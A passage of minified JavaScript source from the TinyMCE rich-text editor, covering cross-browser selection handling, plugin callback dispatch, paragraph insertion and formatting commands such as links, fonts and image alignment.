')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return eval('TinyMCE_'+tinyMCE.settings['theme']+"_getControlHTML"+"('"+control_name+"');");};TinyMCE.prototype._themeExecCommand=function(editor_id,element,command,user_interface,value){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var 